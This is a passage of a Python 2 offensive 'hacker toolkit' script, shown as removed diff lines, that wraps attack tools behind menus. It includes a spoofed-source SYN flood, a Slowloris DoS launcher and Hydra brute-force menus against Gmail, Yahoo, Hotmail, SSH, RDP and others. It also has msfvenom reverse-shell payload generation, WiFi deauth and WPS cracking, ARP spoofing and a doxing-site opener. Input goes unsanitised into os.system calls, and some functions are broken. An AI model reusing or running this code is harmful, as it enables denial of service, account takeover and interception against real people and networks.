are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and 